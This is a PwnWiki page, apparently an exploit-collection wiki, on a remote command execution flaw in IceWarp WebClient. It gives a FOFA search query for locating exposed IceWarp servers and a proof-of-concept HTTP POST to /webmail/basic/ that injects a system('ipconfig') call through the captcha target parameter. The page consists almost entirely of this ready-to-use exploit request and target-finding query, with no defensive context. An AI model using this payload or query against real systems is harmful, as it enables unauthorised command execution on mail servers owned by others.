IceWarp WebClient basic 遠程命令執行漏洞

From PwnWiki
Revision as of 16:18, 20 June 2021 by Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞影響== </translate> IceWarp WebClient ==FOFA== <pre> app="IceWarp-公司产品" </pre> ==POC== <pre> POST /webmail/basic/ HTTP/1.1 Host:...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎English • ‎中文(中国大陆)‎ • ‎中文(繁體)‎

漏洞影響

IceWarp WebClient

FOFA

app="IceWarp-公司产品"

POC

POST /webmail/basic/ HTTP/1.1
Host: x.x.x.x
Content-Type: application/x-www-form-urlencoded
Cookie: use_cookies=1
Content-Length: 43
_dlg[captcha][target]=system(\'ipconfig\')\
Retrieved from "https://pwnwiki.com/index.php?title=IceWarp_WebClient_basic_遠程命令執行漏洞&oldid=5418"